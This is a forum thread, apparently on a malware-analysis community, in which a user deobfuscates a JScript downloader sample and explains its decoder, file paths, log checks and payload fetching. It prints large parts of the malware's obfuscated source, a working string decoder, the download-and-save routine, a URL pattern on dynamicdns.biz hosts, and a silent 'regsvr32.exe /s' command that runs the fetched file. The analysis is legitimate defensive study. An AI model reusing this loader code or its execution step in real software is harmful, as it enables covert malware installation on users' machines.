function AswjleihykadfjosijfoeLpdkqufr(FaqhlwugtlkosdfjjiaGwlnigi)
{
var Faqhlwugte4ijiwyNaflwigt;
WScript.sleep(HafleihthsdyeIsqxeihy);
return Faqhlwugte4ijiwyNaflwigt;
}

Conclusion :

The person who made this method have done a relative good job, when compared with a lot of other obfuscated methods I used to see, these last months.
 
Last edited:

JM Safe

Level 39
Verified
Top Poster
Apr 12, 2015
2,882
EDITING - WORK IN PROGRESS

From 08-07-2016-10-brazilian-malwares
https://www.hybrid-analysis.com/sam...b1d6ecf4154f32b4529b987271b?environmentId=100

I dis-obfuscated this sample, was funny as it was a a challenge to myself :p

(1) Main decoder function :

This function is mainly used to decode string as path , files names, url used.
It call several other functions, very obfuscated too.

I simplified all to have a 'more easy to read' decoder, to be able to dis-obfuscate all the sample file.

function NaflwigtGwlnigiLpdkqufrRgxqojrn(OafwhmtdhgdfgsaaFaqhlwugt)
{
var LpdkqufrjlkhiuhfueCgxqojr;
var AswjleihylkwhfweBxmohen;
var NaflwigtxsdfserMaqkwugr;
var CgxqojrsdhuiersfEqknugp;
var Faqhlwugtsdhu11i11ersfGwlnigi;
var DpqgkqufrhsdyeHafleiht;
var EqknugprftggeLpdkqufr;
var Eqknugpd7heNaflwigt;
Faqhlwugtsdhu11i11ersfGwlnigi = "";
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
AswjleihylkwhfweBxmohen = "";
Eqknugpd7heNaflwigt = "GwlnigiNaflwigtIsqxeihy";
NaflwigtxsdfserMaqkwugr = Dpqgkqufrjhs11ksMaqkwugr;
LpdkqufrjlkhiuhfueCgxqojr = "LpdkqufrDpqgkqufrMaqkwugr";
CgxqojrsdhuiersfEqknugp = HafleihtnishyswsIsqxeihy(OafwhmtdhgdfgsaaFaqhlwugt,Dpqgkqufrjhs11ksMaqkwugr,EqknugprftggeLpdkqufr);
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
DpqgkqufrhsdyeHafleiht = "GwlnigiFaqhlwugtIsqxeihy";
OafwhmtdhgdfgsaaFaqhlwugt = EqknugpasheywsLpdkqufr(OafwhmtdhgdfgsaaFaqhlwugt,GwlnigiogijkoiytiLpdkqufr);
LpdkqufrjlkhiuhfueCgxqojr = "CgxqojrDpqgkqufrIsqxeihy";
while (OafwhmtdhgdfgsaaFaqhlwugt.length > Dpqgkqufrjhs11ksMaqkwugr){
LpdkqufrjlkhiuhfueCgxqojr = "GwlnigiNaflwigtIsqxeihy";
Faqhlwugtsdhu11i11ersfGwlnigi = Faqhlwugtsdhu11i11ersfGwlnigi + Kkxqojrjhskisd33fEqknugp(OafwhmtdhgdfgsaaFaqhlwugt,CgxqojrsdhuiersfEqknugp,Dpqgkqufrjhs11ksMaqkwugr,"LpdkqufrAswjleihyDpqgkqufr",Eqknugpd7heNaflwigt,"GwlnigiNaflwigtJsqgxeohy");
OafwhmtdhgdfgsaaFaqhlwugt = GwlnigijppqoeuyaHafleiht(OafwhmtdhgdfgsaaFaqhlwugt,EqknugpjhgdfsdMaqkwugr,DpqgkqufrhsdyeHafleiht);
}
LpdkqufrjlkhiuhfueCgxqojr = "EqknugpDpqgkqufrOafwhmtd";
return Faqhlwugtsdhu11i11ersfGwlnigi;

}

This is the simplified decoder I make :
function NaflwigtGwlnigiLpdkqufrRgxqojrn( a_string )
{
var first_char;
var current_decoded;

current_decoded = "";

first_char_before_loop_less_65 = a_string.charCodeAt(0) - 65;

a_string = a_string.substring(1);

while (a_string.length > 0){

current_decoded = current_decoded + String.fromCharCode( (a_string.charCodeAt(0) -65 ) * 25 + ( a_string.charCodeAt(1)-65 ) - first_char_before_loop_less_65 - 10);
a_string = a_string.substring(2);
}

return current_decoded;
}

(2) Call to his function :

There are a lot of calls to the decoder function that only product unused data like :

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("OEVFBFRFMFDEYFBFCFDEYFNFDFPFNFDFSDBDAFNFBFN") ;
=> "afvqhdfghdrhtrhw43rfr"

So it makes harder to find the real important calls.

Example with real data :
NaflwigtGwlnigiLpdkqufrRgxqojrn("SDYDWEM"); => "GET"

(3) Path / filed / url :

This way User_Path = "C:\ProgramData\[UserName]\" was found as main path used.
=> created if not exist
The most of the file downloaded will be put there.

Main path :
If log file present but actual script running isn't system.wsf => Quit
if (Objet_Scripting_FileSystemObject.FileExists("C:\ProgramData\UserName\auidxx60.log")){
if((WScript_ScriptFullName != "C:\ProgramData\UserName\system.wsf")){
WScript_Quit(0);
}
}

Create the path :
if(! (Scripting_FileSystemObject.FolderExists(User_Path))){
Scripting_FileSystemObject.CreateFolder(User_Path);
}

Main log files :
log_file_r2 = Objet_Scripting_FileSystemObject.OpenTextFile("C:\ProgramData\UserName\r2.log",8,true,false);
log_file_r2.WriteLine(WScript_ScriptFullName);

log_file_r2.Close();

if((WScript_ScriptFullName != "C:\ProgramData\UserName\system.wsf"))){
log_file_auid = Objet_Scripting_FileSystemObject.OpenTextFile("
C:\ProgramData\UserName\auid.log",8,true,false);
log_file_auid.WriteLine(WScript_ScriptFullName);

log_file_auid.Close();
}
log_file_auidxx60 = Objet_Scripting_FileSystemObject.OpenTextFile("
C:\ProgramData\UserName\auidxx60.log",8,true,false);
log_file_auidxx60.WriteLine(WScript_ScriptFullName);
log_file_auidxx60.Close();
What did you use for disobfuscating the sample?
 

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
My brain, step by step. I 'm currently adding info to the first post, already saved because I don't want to loose intermediate progress by error.

I will removed EDITING - WORK IN PROGRESS from the main page, when finished to write all
 
Last edited:
L

LabZero

From the VT report, it seems JS/Nemucod or variant, so using bitwise XOR as an obfuscation method. As I have understood from your analysis, it primarily uses ActiveX controls as ADODB.Stream to save an executable file in the %TEMP% temporary folder, and run it.
So It seems to download a DLL file invoked using rundll32.exe via WScript.Shell Activex control.
Using ADODB.Stream, it will open the fake PDF/JPG file document. And so on...
 
Last edited by a moderator:

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
I would like to say i understood all this but it would be a lie, mostly it went straight over my head. great post @DardiM :)
:)
From the VT report, it seems JS/Nemucod or variant, so using bitwise XOR as an obfuscation method. As I have understood from your analysis, it primarily uses ActiveX controls as ADODB.Stream to save an executable file in the %TEMP% temporary folder, and run it.
So It seems to download a DLL file invoked using rundll32.exe via WScript.Shell Activex control.
Using ADODB.Stream, it will open the fake PDF/JPG file document. And so on...

My Thread is not an analysis from running (you can find it from the sample threads, or www.hybrid-analysis.com).
=> It's only an analysis of the obfuscated methods used on the downloader, and important parts that can be found with the main simplified decoder i made.

Downloading the sample and editing it is a good way to better understand my post. TAKE CARE IF YOU DO IT

But I will try to answer :)

(0) No bitwise XOR found. I dis-obfuscated this way :
- I first simplified their decrypter (that uses several sub function) to make it more clean (and dis-obfuscated). We can see that it uses char code technique from chars in the string passed as parameter.
function NaflwigtGwlnigiLpdkqufrRgxqojrn( a_string )
{
var first_char;
var current_decoded;
current_decoded = "";
first_char_before_loop_less_65 = a_string.charCodeAt(0) - 65;
a_string = a_string.substring(1);

while (a_string.length > 0){
current_decoded = current_decoded + String.fromCharCode( (a_string.charCodeAt(0) -65 ) * 25 + ( a_string.charCodeAt(1)-65 ) - first_char_before_loop_less_65 - 10);
a_string = a_string.substring(2);

}
return current_decoded;
}
- The decrypter for each NaflwigtGwlnigiLpdkqufrRgxqojrnal call => replaced step by step by real data
ex: NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB")
- replaced their variables (with strange name) by real contain (clear data or decrypted data from above decrypter). This can be seen on different spoiler parts I put on the first post.
- I removed all HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn([some useless string]);

A long sample here :
aBxmohenisxxMaqkwugr = "2";
edCgxqojrkjdi1111khsdGwlnigi = 2+2+3+2+1;
EqknugpammfreadFaqhlwugt = "60";
LpdkqufrsljhirueCgxqojr = "\\";
sdFaqhlwugtkjtirtqKkxqojr = 0;
Dpqgkqufrjhs11ksMaqkwugr = 0;
Hafleihtjhs11ksPlmeheiq = 7+3+16+4+32+3;
BxmohentryetrdEqknugp = true;
CgxqojrertydfgDpqgkqufr = false
GwlnigiogijkoiytiLpdkqufr = 5-4;
EqknugpjhgdfsdMaqkwugr = 1+1;
CgxqojrkdjgdteQxbedyq = 2+4+6+3+7+3;
KkxqojrkwerwweDpqgkqufr = 3-2;
Eqknugpd7d7Cgxqojr = 0;


Faqhlwugtkjst4jayMaqkwugr = NaflwigtGwlnigiLpdkqufrRgxqojrn("UFXFCGCFKFQ");
kjIsqxeihyatOafwhmtd = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDUENEUENELFD");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("XFXFTFIFNGAFKGEFLFTFNFXGEGAFLFNGAGEFT");


var ppjjhMaqkwugrjjhGwlnigi ;
var dfDpqgkqufrregqqKkxqojr ;
var ajgMaqkwugrshdkNameGwlnigi;
var ashtFaqhlwugtewaaGwlnigi;
var Eqknugpgja1111jhauNaflwigt;

Isqxeihyh4h4h4Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDYDUELFBEREYFDCIDP");
Kkxqojrh4h3h2Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFJFMFEFHFA");
Eqknugpgja1111jhauNaflwigt = Isqxeihyh4h4h4Bxmohen+Kkxqojrh4h3h2Bxmohen;
ashtFaqhlwugtewaaGwlnigi = FaqhlwugtdfiuerBxmohen("RgxqojrnshuPlmeheiq");
ppjjhMaqkwugrjjhGwlnigi = WScript.CreateObject(Eqknugpgja1111jhauNaflwigt);


dfDpqgkqufrregqqKkxqojr = ppjjhMaqkwugrjjhGwlnigi.UserName;
ajgMaqkwugrshdkNameGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB") + ppjjhMaqkwugrjjhGwlnigi.UserName;

//C:\\ProgramData\\UseName

ghetstHafleihtytqerGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEGEWFMFDFKFO");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+NaflwigtGwlnigiLpdkqufrRgxqojrn("LFBFGEYCRDQFBFEEWEE");
ghetstHafleihtytqerGwlnigi = ghetstHafleihtytqerGwlnigi+NaflwigtGwlnigiLpdkqufrRgxqojrn("AFGFAFBELETDOEIEQELEJFB");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YFMFLFNFJFNFKGFGAGFFKFXGAGFFKFXGF");
sDpqgkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);

//Scripting.FileSystemObject

edNaflwigtjy3gaFaqhlwugt = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
Cgxqojrjhhq23Eqknugp = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("HERETEUEVEREUERETEWFDFNFDEWFNFDFNFDCTCSCUCVCSCUCV");
aKkxqojrvitiLpdkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);
aFaqhlwugthst33faLpdkqufr = WScript.CreateObject(ghetstHafleihtytqerGwlnigi);


CgxqojrkjdfhsyeDpqgkqufr = 1000+KkxqojrkwerwweDpqgkqufr+32;

//"C:\ProgramData\UserName\auidxx60.log"
if (edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("HEJEJEOFJEW") + NaflwigtGwlnigiLpdkqufrRgxqojrn("FEPFKFK") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("HCNFAFDEU"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHCPEPEQFDEQFDENEQENFDCOFCEPFC") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("VEXEXFVGCFVFWFHFPDCGAFVFI"))){
KkxqojrkkkBxmohen("MaqkwugrDpqgkqufr");
}
}
//"C:\ProgramData\UserName\auidxx60.log"
if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("JELELEQFLEY") + NaflwigtGwlnigiLpdkqufrRgxqojrn("LEVFQFQ") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("OCUFHFKFC"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKEPFGFBFHFCEOFHFCEPFDENEQFHCPCOFEEQCOCOFCEPFC") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("BEDEDFBFHFBFCEMEUCHFFFBEN"))){
KkxqojrkkkBxmohen("CgxqojrEqknugp");
}
}
//"C:\ProgramData\UserName\auidxx60.log"
if(edNaflwigtjy3gaFaqhlwugt.FileExists(ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("CEEEEEJFEEREMFHFH") + EqknugpammfreadFaqhlwugt + NaflwigtGwlnigiLpdkqufrRgxqojrn("CCIEUEXEP"))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFOFUDCDEFRDEDCDDFRDEFUFCFEDDDCFPFDFP") ;
if((ashtFaqhlwugtewaaGwlnigi != ajgMaqkwugrshdkNameGwlnigi + NaflwigtGwlnigiLpdkqufrRgxqojrn("XFAFAFXGEFXFYFJFRDEGCFXFK"))){
KkxqojrkkkBxmohen("CgxqojrGwlnigi");
}
}


if(! (sDpqgkqufr.FolderExists(ajgMaqkwugrshdkNameGwlnigi))){
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("RFPFDFFFSDDDFDEFSDFFSFSFSFVFQFP");
sDpqgkqufr.CreateFolder(ajgMaqkwugrshdkNameGwlnigi);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("VFTFHGAFUFWDHDIFWDJDJDIDJFT");
}

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("LESEXFOFJCWCXCXFRCWCXFRFMCWCXCYFMCYFMFPCXCWFKEXFK") ;
piIsqxeihynqwKkxqojr = NaflwigtGwlnigiLpdkqufrRgxqojrn("GCMCODABXDYDRDIDICP") + ")";
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("TFBFGFWFUDFDGDHFUDGFUDFDHFUFUFHFFFUFXDGDFFSFGFS") ;
AswjleihyutywreNaflwigt = Dpqgkqufrjhs11ksMaqkwugr;
Cgxqojrggrres1Lpdkqufr = 24-20;
Aswjleihyy356haeKkxqojr = 10-4 ;
CgxqojrolkijueBxmohen = Aswjleihyy356haeKkxqojr+Aswjleihyy356haeKkxqojr;
akDpqgkqufrjsdiGwlnigi = 816;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+816;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+400;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+800;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+32;
akDpqgkqufrjsdiGwlnigi = akDpqgkqufrjsdiGwlnigi+400;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("CEJEOFFFAFBENEPFDCNCPFDCPFGCOCNFBEOFB") ;
aEqknugpoeywMaqkwugr = 65;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+35;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+24;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+50;
aEqknugpoeywMaqkwugr = aEqknugpoeywMaqkwugr+25;

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("AEHEMFDEXFECLCMCNFBCLFBCNCMCMCLCMCLEYEMEY") ;


MaqkwugrxxhgsreIsqxeihy = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEHFAFFDR");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("KFLFLFHCQEHFA");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("QEXFDFTFDFBFEFQFBFEFQFDFBFOFUDDDCFPFDFP") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RFMDYFS");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("QFRFNEI");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEREWFNFIFOEXFKEUEXEWFKEUEXEUEWEXFKEUEWEXCWCVFJEWFJ") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFGFK");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("GERFGFH");
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("NEUFAFQFLFRDAFNEXFBEXFBFNEXFAFBCYFMFAFM") ;
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("LCRCY");
MaqkwugrxxhgsreIsqxeihy = MaqkwugrxxhgsreIsqxeihy + NaflwigtGwlnigiLpdkqufrRgxqojrn("RCXDB");
Aswjleihyuhg3atCgxqojr = " (";
Gwlnigikjdyhe5gahsCgxqojr = 34871;
IsqxeihykjshsMaqkwugr = 32876;

HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("SFAFFFVFSFDFFFGFWFWFRFQFWFEFRFQFWDFDEFRFFFR");
fdKkxqojrjkuuqFaqhlwugt = NaflwigtGwlnigiLpdkqufrRgxqojrn("BDBDEDPDEDCCHDTFCFAEMEIEU");

KkxqojrfhttwshPlmeheiq = 2000+96+1500+500;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("TFBFGFWFRFSFRFXFSFRFSFXDGDFFSFGFS");
skdhKkxqojrgfiqwreiPlmeheiq = KkxqojrfhttwshPlmeheiq+KkxqojrfhttwshPlmeheiq;
ajskCgxqojrgfiuyriw4355Oafwhmtd = 1;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("OEVFBFRFMFSDBDAFNFCFDFFFDFBFFFBFN");
aKkxqojrsdhgfqiutrHafleiht = 2;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("WFEFJGAFUGBDJDIFVFNFLFJFNFLFJFNFLFKFJFV");


function GwlnigisdsfghlskEqknugp(cxjfkgriqdafGwlnigi, DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr){
try
{
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("RFFFQDCDDDEFQFVFDFSFVFRFVDEDDFSFVDFDD");
cxjfkgriqdafGwlnigi.Write(DpqgkqufrkjsadhieGwlnigi);
cxjfkgriqdafGwlnigi.SaveToFile(NaflwigtkjsdsfgerieKkxqojr, aKkxqojrsdhgfqiutrHafleiht);
}
catch (Kkxqojr)
{

}
}


function Gwlnigishfiw11kjshasEqknugp(DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr){
var cxjfkgriqdafGwlnigi;

try
{
cxjfkgriqdafGwlnigi = WScript.CreateObject(fdKkxqojrjkuuqFaqhlwugt);
cxjfkgriqdafGwlnigi.Type = ajskCgxqojrgfiuyriw4355Oafwhmtd;
cxjfkgriqdafGwlnigi.Open();
GwlnigisdsfghlskEqknugp(cxjfkgriqdafGwlnigi, DpqgkqufrkjsadhieGwlnigi, NaflwigtkjsdsfgerieKkxqojr);
}
catch (Kkxqojr)
{

}
}

EqknugpkjdshuMaqkwugr = NaflwigtGwlnigiLpdkqufrRgxqojrn("TEGFPGBFJFMFMFBDBDGDADC") + Aswjleihyuhg3atCgxqojr;
EqknugpjsdhrFaqhlwugt = NaflwigtGwlnigiLpdkqufrRgxqojrn("GEPFCFA") + NaflwigtGwlnigiLpdkqufrRgxqojrn("XFUFFFYFNFGFQFJDRCPEKEQEGECCPDNDEDGDRCPEUFNFSFIFTGCFXCPELERCPDM");
DpqgkqufrjsdhuiCgxqojr = EqknugpkjdshuMaqkwugr + EqknugpjsdhrFaqhlwugt + piIsqxeihynqwKkxqojr;


function MaqkwugrllaakkssdKkxqojr(sAswjleihy, sdGwlnigiawIsqxeihy){
var CgxqojrdjfgaaKkxqojr;
var sxJsqgxeohytrAHafleiht;
var stDpqgkqufrrBIsqxeihy;
var stNaflwigtreetrKkxqojr;
var stBxmohenrttrDLpdkqufr;
var cxjfkgriqdafGwlnigi;

try
{
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("KEREWFNFIFOFOEVFJEXFOFJEXFOEXCWCVFJEWFJ") ;
sxJsqgxeohytrAHafleiht = NaflwigtGwlnigiLpdkqufrRgxqojrn("XEEECER");
stDpqgkqufrrBIsqxeihy = "";
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("WFEFJGAFUGBDJDIFOFMFPFSFYFMFSFSFTFYFMFTFVFJFV") ;
stNaflwigtreetrKkxqojr = DpqgkqufrjsdhuiCgxqojr;
stBxmohenrttrDLpdkqufr = akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi+akDpqgkqufrjsdiGwlnigi;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("UFCFHFXFRFWFKFQFWFRFKFQFWFSFYDHDGFTFHFT") ;
CgxqojrdjfgaaKkxqojr = WScript.CreateObject(MaqkwugrxxhgsreIsqxeihy);
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("XFKFJFTFUGAFNFUFNFTGAFUDIFVFWFK");
CgxqojrdjfgaaKkxqojr.settimeouts(Gwlnigikjdyhe5gahsCgxqojr, 34566, Gwlnigikjdyhe5gahsCgxqojr, IsqxeihykjshsMaqkwugr);
CgxqojrdjfgaaKkxqojr.Option(AswjleihyutywreNaflwigt) = stNaflwigtreetrKkxqojr;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKFDENENEPERENEPEREQEQCNCPCQ");
CgxqojrdjfgaaKkxqojr.Option(Cgxqojrggrres1Lpdkqufr) = stBxmohenrttrDLpdkqufr;
HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("DEKENEPEQERENEPERENEQEREPEQCNCQFE");
CgxqojrdjfgaaKkxqojr.Option(Aswjleihyy356haeKkxqojr) = BxmohentryetrdEqknugp;
CgxqojrdjfgaaKkxqojr.Option(CgxqojrolkijueBxmohen) = BxmohentryetrdEqknugp;
CgxqojrdjfgaaKkxqojr.Open(sxJsqgxeohytrAHafleiht, sAswjleihy, CgxqojrertydfgDpqgkqufr);
CgxqojrdjfgaaKkxqojr.Send(stDpqgkqufrrBIsqxeihy);
if((CgxqojrdjfgaaKkxqojr.Status == aEqknugpoeywMaqkwugr+KkxqojrkwerwweDpqgkqufr)){
MaqkwugrllaakkssdKkxqojr = CgxqojrdjfgaaKkxqojr.ResponseBody;
try
{
Gwlnigishfiw11kjshasEqknugp(CgxqojrdjfgaaKkxqojr.ResponseBody,sdGwlnigiawIsqxeihy);
}
catch (Kkxqojr)
{
}
}
}
catch (Kkxqojr)
{

}
CgxqojrdjfgaaKkxqojr = null;
cxjfkgriqdafGwlnigi = null;
}

"c:\\ProgramData\\" => NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB")
(which correspond to "%ALLUSERSPROFILE%" )
"UserName" => ppjjhMaqkwugrjjhGwlnigi.UserName ("DardiM" in my case)
Isqxeihyh4h4h4Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("CDYDUELFBEREYFDCIDP");
// "WScript.N"
Kkxqojrh4h3h2Bxmohen = NaflwigtGwlnigiLpdkqufrRgxqojrn("IETFJFMFEFHFA");
// "etwork"
Eqknugpgja1111jhauNaflwigt = Isqxeihyh4h4h4Bxmohen+Kkxqojrh4h3h2Bxmohen;
//
"WScript.Network"
ashtFaqhlwugtewaaGwlnigi = FaqhlwugtdfiuerBxmohen("RgxqojrnshuPlmeheiq");
ppjjhMaqkwugrjjhGwlnigi = WScript.CreateObject(Eqknugpgja1111jhauNaflwigt);

// WScript.CreateObject("WScript.Network");
dfDpqgkqufrregqqKkxqojr = ppjjhMaqkwugrjjhGwlnigi.UserName;
// UserName => "DardiM" for me :p
ajgMaqkwugrshdkNameGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB") + ppjjhMaqkwugrjjhGwlnigi.UserName;
// "c:\\ProgramData\\" + "DardiM"
//=> "c:\ProgramData\DardiM"

(1) ADODB.Stream is only used here to save files in "c:\ProgramData\UserName" (hidden Folder)
=> if the complete path doesn't exist, it is created.

"C:\ProgramData\UserName\UserNamexmda.jpg"
"C:\ProgramData\UserName\UserNamexmdb.jpg"
"C:\ProgramData\UserName\UserNamexmdc.jpg"
"C:\ProgramData\UserName\guildwg.gif"
"C:\ProgramData\UserName\UserNamewg.gif"


(2) The Regsvr32 Tool (regsvr32.exe) is used to register UserNamewg.gif in silent mode

Objet_Shell = new ActiveXObject("WScript.Shell");
Objet_Shell.run("cmd /c start regsvr32.exe /s C:\ProgramData\UserName\UserNamewg.gif" , 0, true);
WScript_Quit(0);


The other files downloaded are not ran by the downloader.

(3) .log files I found when dis-obfuscating

"C:\ProgramData\UserName\r2.log"
"C:\ProgramData\UserName\auid.log"
"C:\ProgramData\UserName\auidxx60.log"


An interesting point :

if current running script path is not "C:\ProgramData\UserName\system.wsf"
and "C:\ProgramData\UserName\auidxx60.log" exists
then the js downloader terminates : WScript_Quit(0);

if current running script path is not "C:\ProgramData\UserName\system.wsf"
then "C:\ProgramData\UserName\auid.log" is modified.

The WScript.ScriptFullName is written to the end of the log files content (option 8 : Open a file and write to the end)

(4) End of process

I said at the end of the first post
"The malware end with" :
Objet_Shell = new ActiveXObject("WScript.Shell");
Objet_Shell.run("cmd /c start regsvr32.exe /s C:\ProgramData\UserName\UserNamewg.gif" , 0, true);
WScript_Quit(0);

I mean "if everything goes as planned by js downloader"

The loop that creates the urls for several attempts to retrieve the files uses from i=0 to i = 355 :rolleyes:
"https://AswjleihyKkxqojr.infernew0"+ i + ".dynamicdns.biz/04/?v=60&x1x2c=[fileID]";
But it seems there are only 3 domains : 00 , 01, 02
 
Last edited:
L

LabZero

:)


My Thread is not an analysis from running (you can find it from the sample threads, or www.hybrid-analysis.com).
=> It's only an analysis of the obfuscated methods used on the downloader, and important parts that can be found with the main simplified decoder i made.

Downloading the sample and editing it is a good way to better understand my post. BUT TAKE CARE IF YOU DO IT

But I will try to answer :)

(0) No bitwise XOR found. I dis-obfuscated this way :
- I first simplified their decrypter (that uses several sub function) to make it more clean (and dis-obfuscated). We can see that they use char code technique from chars in the string passed as parameter.
function NaflwigtGwlnigiLpdkqufrRgxqojrn( a_string )
{
var first_char;
var current_decoded;
current_decoded = "";
first_char_before_loop_less_65 = a_string.charCodeAt(0) - 65;
a_string = a_string.substring(1);

while (a_string.length > 0){
current_decoded = current_decoded + String.fromCharCode( (a_string.charCodeAt(0) -65 ) * 25 + ( a_string.charCodeAt(1)-65 ) - first_char_before_loop_less_65 - 10);
a_string = a_string.substring(2);

}
return current_decoded;
}
- The decrypter for each NaflwigtGwlnigiLpdkqufrRgxqojrnal call => replaced step by step by real data
ex: NaflwigtGwlnigiLpdkqufrRgxqojrn("YEBDRFBFBEOFXFUFMFXFGFSECFGGAFGFBFB")
- replaced their variables (with strange name) by real contain (clear data or decrypted data from above decrypter). This can be seen on different spoiler parts I put on the first post.
- I removed all HafleihtskdjgkGwlnigi = NaflwigtGwlnigiLpdkqufrRgxqojrn([some useless string]);

A long example here :
aBxmohenisxxMaqkwugr = "2";
edCgxqojrkjdi1111khsdGwlnigi = 2+2+3+2+1;
EqknugpammfreadFaqhlwugt = "60";
LpdkqufrsljhirueCgxqojr = "\\";
sdFaqhlwugtkjtirtqKkxqojr = 0;
Dpqgkqufrjhs11ksMaqkwugr = 0;
Hafleihtjhs11ksPlmeheiq = 7+3+16+4+32+3;
BxmohentryetrdEqknugp = true;
CgxqojrertydfgDpqgkqufr = false
GwlnigiogijkoiytiLpdkqufr = 5-4;
EqknugpjhgdfsdMaqkwugr = 1+1;
